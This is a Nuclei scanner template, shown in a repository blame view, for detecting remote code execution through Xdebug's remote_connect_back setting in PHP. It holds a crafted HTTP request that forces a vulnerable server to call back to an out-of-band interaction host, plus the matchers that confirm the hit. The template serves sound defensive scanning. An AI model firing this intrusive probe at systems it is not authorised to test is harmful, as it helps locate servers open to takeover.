Files
nuclei-templates/http/vulnerabilities/php/php-xdebug-rce.yaml

40 lines
1.7 KiB
YAML
Raw Normal View History

2023-03-13 20:40:41 +08:00
id: php-xdebug-rce
info:
2023-03-17 02:31:48 +05:30
name: Xdebug remote code execution via xdebug.remote_connect_back
2023-03-13 20:40:41 +08:00
author: pwnhxl
severity: high
2023-03-17 02:31:48 +05:30
description: |
The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with xdebug.remote_connect_back enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
2023-03-13 20:40:41 +08:00
reference:
- https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
- https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
- https://paper.seebug.org/397/
2023-03-17 02:31:48 +05:30
- https://github.com/D3Ext/XDEBUG-Exploit
metadata:
max-request: 1
2023-10-14 16:57:55 +05:30
tags: oast,rce,vulhub,php,debug,xdebug,intrusive
2023-03-13 20:40:41 +08:00
http:
2023-03-13 20:40:41 +08:00
- raw:
- |
GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: {{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
- type: status
status:
- 200
2024-12-01 13:57:55 +00:00
# digest: 4b0a00483046022100f04a01e1dd706067d32dd90ac376c5a6da4a966528517c77f8b142422ab831ca022100c6f77edf523f24759579ed5460000bd68cb33b13a30cd8d891bc7d42149af23a:922c64590222798bb761d5b6d8e72950